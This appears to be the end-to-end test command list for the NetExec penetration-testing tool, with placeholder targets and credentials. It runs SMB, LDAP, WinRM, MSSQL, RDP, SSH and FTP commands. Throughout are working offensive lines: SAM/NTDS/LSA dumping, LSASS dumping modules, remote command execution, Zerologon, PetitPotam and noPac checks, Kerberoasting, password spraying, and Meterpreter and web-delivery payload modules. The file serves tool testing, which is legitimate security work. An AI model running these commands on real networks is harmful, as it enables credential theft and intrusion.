210 lines
16 KiB
Plaintext
210 lines
16 KiB
Plaintext
##### SMB
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --shares
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --pass-pol
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --disks
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --groups
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --sessions
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --loggedon-users
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --users
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --computers
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --rid-brute
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --local-groups
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --gen-relay-list /tmp/relaylistOutputFilename.txt
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --local-auth
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --sam
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --ntds
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --lsa
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --dpapi
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -x whoami
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --wmi "select Name from win32_computersystem"
|
|
##### SMB Modules
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M bh_owned
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc -o CLEANUP=True
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec -o LISTENER=http-listener
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec -o LISTENER=http-listener OBFUSCATE=True
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_av
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns -o DOMAIN=google.com
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M firefox
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get_netconnections
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_password
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz -o HANDLEKATZ_EXE_NAME="hk.exe"
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M hash_spider
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M impersonate
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M install_elevated
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver
|
|
# currently hanging indefinitely - TODO: look into this
|
|
#netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_discover
|
|
#netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger -o ACTION=ALL USER=USERNAME KEEPASS_CONFIG_PATH="C:\\Users\\USERNAME\\AppData\\Roaming\\KeePass\\KeePass.config.xml"
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M lsassy
|
|
# You must replace this with the proper CA information!
|
|
#netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M masky -o CA="host.domain.tld\domain-host-CA"
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ms17-010
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M msol
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nopac
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntdsutil
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntlmv1
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M petitpotam
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M procdump
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdcman
|
|
#netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp --options
|
|
#netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
|
#netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M reg-query -o PATH=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion KEY=DevicePath
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M runasppl
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy -o NAME=test CLEANUP=True
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky -o SERVER=127.0.0.1 NAME=test
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky -o NAME=test CLEANUP=True
|
|
# spider_plus takes a while to run, so it is commented out during normal testing
|
|
# netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spider_plus -o MAX_FILE_SIZE=100
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M teams_localdb
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M uac
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M veeam
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=enable
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=disable
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav -o MSG="Message: {}"
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wifi
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M winscp
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M zerologon
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler -M petitpotam -M zerologon -M nopac -M dfscoerce -M enum_av -M enum_dns -M gpp_autologin -M gpp_password -M lsassy -M impersonate -M install_elevated -M ioxidresolver -M ms17-010 -M ntlmv1 -M runasppl -M shadowcoerce -M uac -M webdav -M wifi
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M bh_owned --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M dfscoerce --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_av --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M firefox --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get_netconnections --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_password --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M hash_spider --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M impersonate --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M install_elevated --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_discover --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M lsassy --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M masky --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ms17-010 --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M msol --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nopac --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntdsutil --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntlmv1 --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M petitpotam --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M procdump --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdcman --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M reg-query --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M runasppl --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spider_plus --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M teams_localdb --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M uac --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M veeam --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wifi --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M winscp --options
|
|
netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M zerologon --options
|
|
##### SMB Anonymous Auth
|
|
netexec smb TARGET_HOST -u '' -p '' -M zerologon
|
|
netexec smb TARGET_HOST -u '' -p '' -M petitpotam
|
|
##### SMB Auth File
|
|
netexec smb TARGET_HOST -u data/test_users.txt -p data/test_passwords.txt --no-bruteforce
|
|
netexec smb TARGET_HOST -u data/test_users.txt -p data/test_passwords.txt --no-bruteforce --continue-on-success
|
|
netexec smb TARGET_HOST -u data/test_users.txt -p data/test_passwords.txt
|
|
##### LDAP
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --users
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --groups
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --get-sid
|
|
netexec ldap TARGET_HOST -u USERNAME -p '' --asreproast /tmp/output.txt
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --kerberoasting /tmp/output2.txt
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --admin-count
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --gmsa
|
|
##### LDAP Modules
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M adcs
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M adcs --options
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M daclread -o TARGET=USERNAME ACTION=read
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M daclread --options
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-desc-users
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-desc-users --options
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-network
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-network --options
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M groupmembership --options
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M groupmembership -o USER=USERNAME
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M laps
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M laps --options
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ldap-checker
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ldap-checker --options
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M maq
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M maq --options
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M subnets
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M subnets --options
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M user-desc
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M whoami
|
|
netexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M whoami --options
|
|
##### WINRM
|
|
netexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex
|
|
netexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami
|
|
netexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --laps
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS
|
|
##### MSSQL
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS
|
|
##### MSSQL Modules
|
|
# netexec mssql TARGET_HOST -u USERNAME -p PASSWORD -M empire_exec
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M mssql_priv
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M mssql_priv --options
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
|
|
netexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
|
|
# a bit janky, but we try to enable RDP before testing RDP
|
|
#netexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
|
##### RDP
|
|
netexec rdp TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex
|
|
netexec rdp TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --nla-screenshot
|
|
##### SSH - Default test passwords and random key; switch these out if you want correct authentication
|
|
netexec ssh TARGET_HOST -u USERNAME -p PASSWORD
|
|
netexec ssh TARGET_HOST -u data/test_users.txt -p data/test_passwords.txt --no-bruteforce
|
|
netexec ssh TARGET_HOST -u data/test_users.txt -p data/test_passwords.txt --no-bruteforce --continue-on-success
|
|
netexec ssh TARGET_HOST -u data/test_users.txt -p data/test_passwords.txt
|
|
netexec ssh TARGET_HOST -u USERNAME -p PASSWORD --key-file data/test_key.priv
|
|
netexec ssh TARGET_HOST -u USERNAME -p '' --key-file data/test_key.priv
|
|
##### FTP- Default test passwords and random key; switch these out if you want correct authentication
|
|
netexec ftp TARGET_HOST -u USERNAME -p PASSWORD
|
|
netexec ftp TARGET_HOST -u USERNAME -p PASSWORD --ls
|
|
netexec ftp TARGET_HOST -u data/test_users.txt -p data/test_passwords.txt --no-bruteforce
|
|
netexec ftp TARGET_HOST -u data/test_users.txt -p data/test_passwords.txt --no-bruteforce --continue-on-success
|
|
netexec ftp TARGET_HOST -u data/test_users.txt -p data/test_passwords.txt |